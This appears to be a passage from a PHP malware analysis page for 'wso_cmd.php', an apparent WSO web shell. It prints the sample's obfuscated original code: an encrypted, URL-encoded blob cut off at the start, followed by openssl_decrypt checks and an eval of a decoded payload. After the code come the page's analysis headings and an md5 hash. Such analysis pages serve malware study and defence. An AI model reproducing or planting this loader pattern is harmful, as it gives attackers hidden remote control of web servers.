u3lXr2D60PcJwJkxvo6RffmT3b%2BJgewozG%2B2pCW2bXp3tXTyPISeDnB89FKTriDyZbIOG003Nk%2F0fdxjR7HSDeYLW5U%2FJF8DGe%2F3ZSHEOsXYOqqALpDjGVQp7Dn3uIt1BC1d5dCiynGNYDTWdMA6eerM%2FDzdRWRmKw%2BzKSTI4BGvv5OhneCfiXek59qPP%2Fr%2FPBT8exCXJMYvMlPuXbk78x%2BbbNepaRx2PH63U8NvLsrVFM9DRSGTC%2F9DJxX0H%2F4CePOKUZ1KzuOxZnirHi%2BgCtz1e0eryH2NRXzXrMb43cY7%2FHGr9Wb9qi4nltwFFseIJ8pLUnoeP45Hzb%2BPw5xOdr2w3%2BO2vxn%2BS9V9h2uWNqSyfN%2BpzE8GeLyZvdoU48%2BUH15uiV76j5M49I%2BdVviFshcnXw8z6XJ74zyeUjH3nUd0z3uS550DMEPc7NvVlx%2F5SgN3n2hyPrb5DA%2FCDU1Ap6nw%2BQ7dJh0N7PH%2BtF4Jhi06swG4sJ6v0Rcqzc2S1qaW%2FlwX5TOuFa%2FehrqUZ5bdyxmsjjH3%2B8d7p08vMcAP1AvYyNtZ%2F4R%2BgJJGOOJKXybf1gwEKOckd1eH9zUAp5htey53q6jMNMLUJxyeTNG76gf6bOW90rr9nL6iHzg8pIopXt3Jem1T5r6yTD1zh9vbdxDLohtbmPVq91jNq4571C5bGceUJptHrgl1KCD8Js%2FG247vKK2dSILs9wXPTjowwmjY5%2Bon4JxDgl9o8hNzXfl0b1wPMw0ilTf3rujwd%2BuhCeaDqS6cmmnvSD11zmOy7k%2F73bxfS4N1Gb99DfRtqijHo7o09GF%2FpMSpL7d6LiDyIiwxV9lSSp5pD4O2QOJn9uPPZJDhIhTj%2FAh4VAXgqdD3N54HtTpJatLEyqLmwi3D9oQi2L%2BD5RKPSwTOdL%2BagPjyeV9fL4NqpHxz2Pq2JNqW7Y4pK4QqyaBP85HZHamOptP81pMcxRIJ%2Bhz7rHbOZA1qxkNfRNjaBXxbcIZio7NXN0mN0Zz50Yfae1J%2FB7WZdYb41s79rgVWwg1%2BQB7MfHbWnYX9m6w%2Fx1hrwEtYFh5YlAq2xr0%2B%2FqYdm9%2FBjsUv62%2FXGyMMBuLqy1SbHOZxFmf%2Bu37b%2B2hcU3ixD%2BfByro7wmY61I33kN%2Fu9zyZ9htgTfxppFqIFVo5NNYHnZc8SaNHL9rs7EIqJqi5RwfGvjD3xUh4kN6KbYglnQxhBHnCbUq8ghr2aQDPwVckzR5gQ68x1jQn%2Bik7uEmhp9wMze6HFsc9ARgb%2FP0zCJiU3KNpeF7H17RoC0tkeQ2xmh3ltDPkOa1%2FWQs0fdh5o8qQFC6wtNryI1tY3x5D1La5939v6o9H3Mk49L6AJ1MJ3Y5gEjxHTp8Gr2ljCnX6PVpdGxeycg2xR1nahmTkSWf5Gy32AhZD1c15efIjmq5hWyw6sPtfTbic%2Bl2rujfvGk9Au7Z9dv2blu6gQ7w9E1IiDLokvSPOvyOVp7QAPqVtV9y%2Ba2wCoKn52N8H6b6a2btohIW38m%2B8OmttSmjErPmeXQ18z5zNjsywJpLnxz0fk9Y8%2BU3Dguy74Wsn2SfwtOZg69%2BIX3rn1%2FjY5orUD%2BMtoaRcfnR%2FCbxZDP6TOZIKfcAkeMg8zMsRuDbXDKZzOWC09ctnbu4vvKl3pQ9Ok790vI8xqrc4jT30lAW1uMe%2Fraq827Abmjw4RqcRyt2LkOySNJBdsWApuTIsAEdCv4GdWqyMJsUfAzomZOauTLOAZtDeY9%2FyHs8JFx%2Br7BMZsHId%2BzetBh1Nbz4gr5I%2B1kCzk%2Bdy4Xl3vTfy%2B8DbhXqJrxWWKv0Qt8c23jivsK%2BMMsgrzkO8q%2FY%2Fb%2F2XAdSGLRnK8hdv70rP9Yd%2Bgvwg0VIPfMw8GnBN%2BNBa6f7MfBhg66y2kNshdNLFLWv8h7h%2FWrRptLujlnmwfQH%2FpW2%2BdlqPDHPsl95msjzxCbZRcje2deRq6ZR5u07GmckOhl4rnx7QL62bvYv0voDPKv4FvP9gJdUq%2F6N96tr8t6MY7paex2eXE6P%2Bwdj52NnEO56UF5HVYXbTzzs4%2BxDOMzkOHMxfFvzP%2Ba3BaDPy4vo7m7YlgHo97ygb488sl%2BVoBcXLMYgHmLx9zL87SM1pFzF8b1hfGEGfYcDHP7aL%2B%2Bnrx7kMOTxGQ6r7yYWVqefGZgM2cKs627vHhOk%2BM9V688N2nrFqsVqI0d3i8z2ms2P6KqwdF8mDt4zj1th%2F4%2BMYY%2B%2F5jkvNZyXNjZL7089wT9DHv3HbGMNp0sGOREYrDh81nZ48xoMXkOLKepaeAuhfceu57HtMZN5shxrdL5ubClLABRVpPYM3YmNsaNrqAXBT%2BatTHfx%2FP0zBH6AIijJg%2BmeIst9n8BXe%2Bg%2FyAiNf6RvvUf6P%2FqvGx6z76vMVvm33%2F%2FD%2FTvVMI%3D';if(!function_exists('openssl_decrypt')){die('<h2>Function openssl_decrypt() not found !</h2>');}if(!defined('_FILE_')){define("_FILE_",getcwd().DIRECTORY_SEPARATOR.basename($_SERVER['PHP_SELF']),false);}
if(!defined('_DIR_')){define("_DIR_",getcwd(),false);}$e7091="WitRVDRlTnV1UkliMGpLdndRb1NQMW5HK01ESU5nOGRFYWFIc3cvTjNXK054QWozQjB5Z2kzcWdxR3YwWmlTME1FMEREOTZWVWdOcUs1SEJCcUdPc0JRaTU1Tlg0eFQ0aWFMTU4xczVZR2JjWWwyeVJTRFJPTlpydExpN1VZMno=";eval(e7061($e7091));
PHP Malware Analysis

wso_cmd.php

md5: 37c327e9626364a885d9c0ccd02797b4

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
